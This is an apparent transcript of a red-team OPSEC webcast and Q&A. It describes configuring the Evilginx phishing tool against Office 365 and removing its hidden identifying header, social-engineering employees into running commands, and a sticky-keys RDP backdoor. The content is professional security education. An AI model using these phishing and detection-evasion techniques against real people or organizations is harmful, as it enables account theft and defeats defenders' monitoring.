So the way that I’ll take a look at that traffic is if it’s clear text, I can just look at it in wireshark. Piece of cake. If it’s encrypted I might want to proxy it through burp if it’s sending web requests.

That way I can see what those, web requests are, even if they’re encrypted, I can still see what that decrypted request looks like. Also, you can try simulating the target with MCAT or Netcat.

You can open up a port and just aim the tool at that port and you’ll see what it’s sending into the port. To give you an example of using this process, this is, evil jinx and it’s a tool for phishing against web services that have multi factor authentication enabled.

And so this is actually a situation that I ran into where I kind of had to go through this process and learn some lessons. So this is me running evil jinx for the first time. So the first thing I did was I downloaded the latest precompiled release from GitHub keywords there.

Number two, I configured a fishlet that’s evil jinx speak for your configuration that targets whatever website, in this case, office 365. Number three, I generated a lure, which is the landing URL that you’re going to send to your phishing victim.

And then I visited the lure in my browser because I wanted to see what this looks like to the person on the other end. And number five, everything looks okay, right? Like the screenshot there looks just fine.

then I pasted this lure into Google Chat and, everything did not look okay. You’ll see in that screenshot that there is a preview of the Rickroll video from YouTube for some reason showing up with my URL and I’m like, why in the world did this happen?

So, sorry, wrong button. So I started looking into this and looking into the source code some there, I found that there is a default redirect URL that by default links to this YouTube video.

And there’s a comment next to it that says Rickroll. So, easy enough fix. I went in and I changed some, a configuration option with a config command and I could change that to any website I wanted it to be.

It’s not the Rickroll video anymore. So I’m all good. lesson learned. Read the source code and understand those configuration options. Well, that button keeps getting me lesson learned, I thought.

But there’s more. So while looking into that, searching around on the Internet, I found this tweet from kubogretzky, the creator of Evil Jinx. And the tweet says, tip for blue teams.

Look for the X evil jinx HTTP header in the requests. And I’m like, what ex evil jinx HTTP header?

Well, so at that point I decided I would take a look at the traffic and I inspected that traffic with burp suite. Sure. enough on line number eight there in the request that evil jinx makes to the Microsoft Office 365 login page.

It was including the x evil Jinkx header that included as a value the fully qualified domain name of my ATT and CK website.

And I definitely didn’t want to leak that information, especially if I was going to be targeting not Microsoft. Like if I’m sending a request to something that’s hosted by the target organization, that would be even worse.

The blue team would have direct access to that information. So I started looking for ways to remove that header. I looked through the settings, I didn’t find any settings to change or disable that header.

I didn’t find any mention of it in the documentation. And I also didn’t find any references to it. Whenever I searched the source code, you can see my grep command there. I was trying to search through all the files in the source code that I downloaded from GitHub, to see if there’s any mention of it, but there was none.

So looking more closely here, I found that in the HTTP proxy go file, in the source code, there were actually three different sections of code that had been spread out across several different lines that were not altogether in the source code that put this header back into that request three separate times to make sure that if I removed just one of them, which I did, and then I wondered why me removing it didn’t work.

If I removed just one of them, it wouldn’t fix, the problem. So after a lot of grepping and a lot of reading through that file, I found it. What really gave it away was the words like nothing to see here and can’t find me.

So I was a little fortunate that those were in there. But fortunately after I did that, I removed all those lines from the code, I compiled the source code that I had modified, I inspected the outgoing traffic again and no more x evil jinx header.

So another lesson learned, always inspect the network traffic. Because if you’re like me, you’re probably really terrible reading source code, especially if it’s in languages you’re not really that familiar with.

And you might get some better results if you check out the network traffic. And that’s the end of my webcast. So thank you all for listening.

Ralph May

Michael, great job. Thank you for your first time. That was smooth. Very smooth, very easy articulate, very easy to understand.

Michael Allen

I’m glad to hear that.

Ralph May

Yeah. All right. So we do have a couple questions. So I’m going to go through here. The team was doing a pretty good job and the community was doing a good job responding to questions throughout.

This question came from Jim says, I have observed that vms may inhibit some capabilities. The presenter is recommending using vms as he observed constraints.

Testing with vms.

Michael Allen

Yeah, I did run into a situation where like I’ve run into for example a VPN client that for whatever reason would not run inside of a vm.

So I just have to take those situations on a case by case basis. That particular VPN client, it was something really weird. I don’t even remember what the name of it was, but it was one I hadn’t run into before.

And what I ended up having to do was just to take an extra computer, install windows on it and go with a fresh install on a new machine. So that way I still had my relatively safe environment that’s not going to like leak any other customer data, but that I could get that working on.

But those situations are usually pretty rare in my experience. So I don’t, fortunately I don’t run into that a ton. Otherwise I might have to keep an extra computer or something laying around for that purpose.

Ralph May

This question wasn’t asked, but I want to know what’s the one time you got caught that made you really like want to start being better at OPSEC?

Michael Allen

Okay. Actually there were some stories that I had to cut from this presentation because of time. So one of those stories and let me see if I can go back through and find the slides that were kind of related to it.

It was in regard to cloud service providers. So the IP address kind of relates to this, talking about not using the same source IP address.

Just like you don’t use the same source IP address for everything that you do, you also want to not use the exact same cloud service provider for everything that you do. This happened on a red team that I was on at another company.

So not with Bhis, but it just so happened that we were using the same cloud service provider for all of our red team infrastructure. Now they weren’t the same servers, but they were all hosted by the same company.

So the blue team actually was able to figure that out ahead of time. What happened was for every one of those servers that we stood up, we went out and we registered typo squatted domain names and they got alerts that told them that all these domain names have been registered that look like your company’s domain name.

And they then saw the IP addresses that those were all pointing to, and they went and investigated those IP addresses and found out they’re all pointing to ips that are on the same cloud service provider.

And we don’t have any customers or employees who will have connections coming from that cloud service provider. So let’s just block all, all traffic to that cloud service provider. So we were really, really successful in getting payloads through to this particular customer.

It was to the point that, like, I was in a, chat with employees, there were new employees. It was like online onboarding process that this company did because they were a big company and they had employees m all over the place.

So they had everybody join like a webex. And I, was in the chat, and I’m literally telling these people, type this command into your computer and run it. And they’re doing it because I’m telling them, this is going to fix a microphone issue.

We’re getting feedback from your microphone on the conference call or whatever. And I’m from the help desk. I’m from it. And they were doing it, and we could see that they were doing it, but we could never get that command and control channel established.

And it was because that, ahead of time, the blue team had already, before we even knew it, they had already blocked our, infrastructure. So, yeah, that’s where a bunch of the stuff that I mentioned in here comes from is because, that one in particular, they were really, really good at staying on top of us and getting things done ahead of us before we could, even before our attack even got going.

Ralph May

All right, everybody, that is the end of the official Black Hills information security. We have Opsec fundamentals with Michael Allen. Reminder, he does have a red team class coming up with the wild west hacking fest.

So if you’re interested in that, I think I dropped the link and go to webinar and in discord. But we hope you enjoyed today’s webcast. If you ever need a pen test, where to find us. What we’re going to do right now is we’re going to end the official webinar, but we’re going to stick around for like, 5610 minutes, maybe answer your questions.

Also, Deb is going to come back on to, the webcast so that we can talk about factors and breaches for a second because we’ve got a cool thing that we think you might like.

So, Michael Allen, thank you so much. You have any final words?

Michael Allen

Nope, I didn’t prepare any final words.

Ralph May

All right, everybody. All right, so the webcast is over. We’re at what’s called toe show banter right now. So more casual, laid back. My question for you is, do you prefer red team exercises or do you prefer standalone penetration test?

Michael Allen

I like red team exercises m a lot because you can get really creative. It’s, it’s a lot more fun to be like a real attacker instead of just kind of being limited both within the terms of time and in like, what your scope is, you’re allowed to go after.

So red teams are definitely my favorite, but they are a little more high stress because I get way more into them. So I feel like the stakes are higher with red teams.

it’s kind of like you can do whatever you want, but also there’s, there’s, it’s a little bit harder to succeed. Like, you’re working against an active defender.

So I, guess that that probably adds to the fun as well. Yeah, red teams for sure.

Ralph May

Yeah. Someone asked earlier about how to get started in red teams. So they’re in it and they’re like, hey, I want to get in red teams.

And so do, you have any thoughts on how people can get started red teaming?

Michael Allen

I don’t know what the right answer is, but I can tell you what I did.

Ralph May

Yeah.

Michael Allen

so I started by hacking for fun for a long time. And if you’re, if so that’s the, like, the main thing I think, in this industry is, if you do it for fun, it’s going to be easy enough to do it for long enough that you’ll get good at.

So, if you’re kind of, if you get into it for the wrong reasons or anything, then I kind of would recommend staying away from it because this is the kind of thing where you need to put in a lot of practice.

And if, people who get good at things, practice is fun for them, but, for people who the practices work for, they had to work really hard.

So that was, that was how I got into hacking to begin with, at least was, just hacking for fun for years. And then, and I had an it background coming out of school and stuff.

And I started out as a pen tester. So I got my first job as a pen tester with coal fire and did that, worked my way up in that.

And then, then, as you become a senior pen tester, that’s when they start letting you do red teams. Or at least that’s how it was whenever I first got hired there. So I kind of worked my way up from pen testing to doing the red teams and, and, then it’s just kind of gone from there.

But that would, that would be my recommendation is, if you really enjoy hacking, then start working your way into a pen testing role and then, try and get into a red teaming role from there.

It might be different with some places where you could get hired. Like some places would probably let you, start doing red teaming right out of the gate. There’s always option of becoming, an independent contractor consultant kind of thing going that route too.

So my answer is not exactly the right answer. It was just my answer.

Ralph May

Kat wants to know as a purple teamer. So there’s the comment and a question. As a purple teamer, this was really great and opened my eyes to some things that I was missing, especially the evil jinx header.

Any other gathered tips, tricks rather than going through the whole deck?

Michael Allen

none that come to mind. Right off the top of my head, the evil jinx thing was like, when I was thinking about this, topic, it just illustrated it so well because that was one of the times that I’ve found something in a tool that was obviously put there to trip up people that didn’t actually pay attention to what the tool was really doing, which included myself.

And so it was just a perfect example. Other things, I guess probably the fact that I don’t have anything else to pull off the top of my head like that is probably a good indication that there are probably other things like that that are happening on stuff that I’m doing right now that I don’t even know about.

Ralph May

Mhm. I think Chad said, maybe this is a loaded question, but what is the general amount of time spent on a red team engagement? Are you solely working on one engagement at a time or several at a time?

Michael Allen

That really changes a lot from like red team company, the company that’s performing the red team exercise, to the next. Also, it’s, there’s a big difference between red teams that are internal to an organization versus, external, like third party red teams.

So I can really only speak to third party consulting red teams. And, the ones that, the companies that I’ve been at, there are red teams that last quite a while and usually those are ones that, the customer has specifically said, we want this red team exercise to last for a month or two months or three months or whatever.

Right now, the standard with Bhis is typically like two testers for three weeks on the red team. And, we’ll usually spend anywhere from, like, one week to one and a half weeks on the first, like, the gaining access portion of the red team.

And if we haven’t got access somehow by that, midway point, then we’ll, switch over to assumed breach mode. So that way the customer gets an idea of, what their security posture looks like if somebody does get in.

Now, that said, pretty much everywhere that I’ve worked, if it is kind of a short term red team like that, the testers that are on it are doing things leading up to the red team, like, if they have any spare time at work, which maybe more people have spare time at work than I do.

I guess I’m pretty bad at time management. But, if there is any spare time at work, it’s spent preparing for that red team. So that’s something I talk about in the class, too. There are things that you can do ahead of time that aren’t necessarily attacks, your reconnaissance, preparing.

Like, you can get things ready enough before the red team starts that ideally, if you had enough time to do that, then you can be ready to just push a button on day one of the red team and some of your attacks are ready to go, and then you can spend the rest of that time, looking for those, those one off vulnerabilities, the really cool stuff like, zero days and web apps or something like that, that Justin angel is really good at.

On our team. He found one of those in the last red team me, M and him did together. It was really great. But, yeah, that’s typically like, you’re looking at a total of six, six working weeks, two testers for three weeks, and, whatever time we can add to it to get a little bit of a head start.

Before that.

Ralph May

We’Re going to take about two more questions. We got a bunch of them. So what I’m going to do is send you all the questions, and then if you’re like, hey, here’s an idea to write a blog, or here’s something else that’s in the class, or here’s a future webcast, maybe we can do that.

Next question is for, I like this. So I like all your questions evenly, but this one I really like a little more. This one’s for remote red teams using an implant, like a raspberry PI.

Do you usually connect back to your infrastructure through the client network or using an outbound solution, out of band solution?

Michael Allen

That depends on the context of the implant. So if it’s something that the customer has, like, given us access to their network with that implant, we’re usually connecting back through their network.

That’s usually the assumed breach portion, is when we would do that type of thing. Usually when we’re connecting through some other connection, be it like a cellular connection or maybe, the guest Wi Fi in the building next door or something like that.

That’s usually a red team where we’ve gotten physical access covertly somehow, and we plug that Dropbox in ourselves, and we’re using that channel to get back.

Usually the way we have to work for when we use an implant like that on a remote red team is that the customer gives us that access. Now, one thing that I like to do is, whenever possible, if we can, instead of getting that access, either have access to a workstation or a virtual desktop, as though we have compromised an employee’s account and are now working through that employee’s account.

I would prefer that, because that really doesn’t give as much of a tell, especially if it’s like, a remote employee or someone that’s expected to be connecting in remotely that week, or to provide our point of contact with the actual beacon payload, just an executable file, and have them run that on some system in their network, or maybe more than one, and see if will that beacon call back to us in such a way that the blue team doesn’t pick up that c two traffic, and then, if so, we’ll just operate from that and, go from there, just like we had actually been successful in the phishing attack or, whatever attack that it was that would have got that payload to execute on the system, we’re going to do.

Ralph May

One more question before we go. For everyone that purchased a black hills t shirt today, they’re super soft, but for everyone that ordered one, thank you so much. We’re going to donate $2 of each shirt sold to the rural tech fund.

Do you miss the part where we talked about the rural tech fund? Rural tech fund. RTF. RTF, you go to our, Ruraltech fund.com.

we’re going to donate $2 to the rural tech fund. So thanks for doing that. And then if anybody wants a personal demo, I put Deb’s email in the go to webinar chat. All right, so last question.

Has there ever been a time where you were doing your attack and had to stop or switch to blue because the company had another malicious attack happening simultaneously?

Michael Allen

No, there hasn’t been one. On a project that I was on. I have heard stories from other testers where they did come across something like that. My friend Corey, he was on a project.

I don’t remember if it was a red team or a pen test, but he was checking remote desktop sessions to see if there were any back doors installed.

I think if I remember, there’s a tool to do that that he was using. But I mean, you connect to the remote desktop service and if they don’t have credssp, or NLA enabled, then you’ll actually get a login box in the remote desktop window.

You do things like press shift five times, which is the sticky keys hotkey, and make that little, box pop up. Well, if somebody’s compromised that system, or if I’ve compromised that system because I do this, then I’ll stick a backdoor on there where if you press shift five times or you press windows key u or whatever it is, then instead of the sticky keys dialog popping up, a command prompt will pop up or some other equally useful thing like task manager, because some places will alert on command prompt.

So yeah, he was connecting to these remote desktop services that were facing the Internet. And he hits shift five times and a command prompt pops up and he talks to the customer and he’s like, did you guys know that this backdoor is installed on this system?

And their immediate reaction was, yeah, we knew that. That’s how our administrators connect remotely into the network when they’re working from home.

And that was not true at all. They were totally breached and we had to stop the test at that point. Or he did. And I, when something like that happens, I’m never on the team, on the part of the team that goes into, the blue team mode and helps, with any kind of defense or anything like that because my background is 100% offensive, so I don’t really have a lot of insight to give, unfortunately.

But they did have to switch into that incident response mode and, start, trying to figure out what was going on there.

Ralph May

Yeah, there’s been a few times we’ve played backdoors and breaches internally. And you all are so good at offense that we’re like, all right, so how would you defend against this attack? You’re like.

Michael Allen

Yeah, I don’t know how to defend stuff. I just break them.

Ralph May

Which is why now we have the purple team and blue team services, just in case you’re like, so you broke all this, now how do you fix it? We’re like, oh, we got a guy for that or a person for that.

All right, everybody, that is the end of posture banter today. Thank you so much for sticking around. 660 of you stuck around. So hopefully, I’m sorry, you have to go either back to work or it’s either nighttime and you’re drinking because you’re overseas or you’re not or whatever the case is wherever you’re at in the world.

Thank you so much for joining us today, Michael, thank you for this presentation and your insights and sharing your knowledge with the community. And we’ll see you all next time.

Michael Allen

Bye.

Ralph May

I’m m ending the webinar.

I hate that. my ears off, so it makes my glasses off. It’s fine. It’s just the way guys made me.